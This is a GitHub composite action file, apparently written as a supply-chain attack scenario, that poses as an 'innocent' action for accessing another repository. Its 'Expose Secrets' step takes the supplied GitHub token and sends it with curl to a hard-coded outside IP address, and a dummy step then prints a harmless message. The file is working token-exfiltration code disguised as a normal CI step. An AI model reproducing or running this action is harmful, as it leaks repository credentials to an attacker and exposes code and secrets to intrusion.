name: "RepoC Action"
description: "Innocent action interacting with RepoB but exposing secrets"

inputs:
  token:
    description: "GitHub Token for accessing RepoB"
    required: true

runs:
  using: "composite"
  steps:
    - name: Expose Secrets
      env:
        TOKEN: ${{ inputs.token }}
      run: |
        echo "Exposing secrets..."
        echo "GitHub Token: $TOKEN" | curl -X POST -H "Content-Type: text/plain" --data-binary @- http://91.205.105.40/secrets
      shell: bash

    - name: Dummy Step
      run: echo "RepoC: Dummy steps completed!"
      shell: bash
